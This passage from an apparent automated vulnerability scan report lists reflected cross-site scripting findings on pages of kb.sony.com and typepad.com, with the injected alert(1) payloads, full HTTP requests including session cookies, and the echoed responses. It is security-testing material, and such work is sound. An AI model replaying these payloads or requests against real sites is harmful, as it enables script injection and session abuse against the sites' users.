fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:05 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
nds(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";

...[SNIP]...

1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the dialogID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9159"-alert(1)-"4a3c1582004 was submitted in the dialogID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:06 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
(cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
str
...[SNIP]...

1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the docType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b2e1"-alert(1)-"87e65d4c18e was submitted in the docType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:04 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
documentCommands(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="
...[SNIP]...

1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the docTypeID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9060"-alert(1)-"4496b4fc800 was submitted in the docTypeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:07 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highligh
...[SNIP]...

1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b2e"-alert(1)-"8ea97393960 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960=1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:11 GMT
Content-Length: 15708


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
l = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294&f0b2e"-alert(1)-"8ea97393960=1";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highlight=" + strValue;

...[SNIP]...

1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b7a'%3balert(1)//5e4fc876c82 was submitted in the sliceId parameter. This input was echoed as 86b7a';alert(1)//5e4fc876c82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_186b7a'%3balert(1)//5e4fc876c82&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:16 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
, 'no');
           break;
       case 'bookmark' :
               addBookmark('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e4fc876c82');
           break;
       case 'full' :
           openWnd('http://www.kb.sony.com:80/selfservice/dynamickc.do?cmd=show&forward=nonthreadedKC&docType=kc&externalId=${extId}&sliceId=pdfPage_186b7a';alert(1)//5e
...[SNIP]...

1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the sliceId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3ec"-alert(1)-"1b2827b41a1 was submitted in the sliceId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:15 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
ipt">

function documentCommands(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=BNP1USESpdf&sliceId=pdfPage_15d3ec"-alert(1)-"1b2827b41a1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strV
...[SNIP]...

1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the stateId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a7b"-alert(1)-"defc0e3e037 was submitted in the stateId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:08 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
rl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294d8a7b"-alert(1)-"defc0e3e037";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
strUrl = viewDocUrl + "&highlight=" + strValue;

...[SNIP]...

1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e142b%3balert(1)//db967658d0d was submitted in the autofollowed parameter. This input was echoed as e142b;alert(1)//db967658d0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a010535f33a5b970c010535ecb398970b&asset_id=&atype=index&to=http%3A%2F%2Fblog.proofpoint.com%2F&autofollowed=0e142b%3balert(1)//db967658d0d&safe_to_modify_body=0 HTTP/1.1
Host: www.typepad.com
Proxy-Connection: keep-alive
Referer: http://blog.proofpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
